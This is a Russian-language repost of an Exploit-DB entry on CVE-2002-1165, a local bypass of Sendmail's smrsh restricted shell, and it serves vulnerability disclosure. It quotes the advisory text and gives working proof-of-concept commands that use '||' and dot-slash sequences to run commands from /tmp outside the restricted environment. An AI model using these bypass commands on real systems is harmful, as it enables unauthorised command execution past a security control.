- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21884
- Проверка EDB
-
- Пройдено
- Автор
- ZEN-PARSE
- Тип уязвимости
- LOCAL
- Платформа
- UNIX
- CVE
- cve-2002-1165
- Дата публикации
- 2002-10-01
Код:
source: https://www.securityfocus.com/bid/5845/info
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
- Источник
- www.exploit-db.com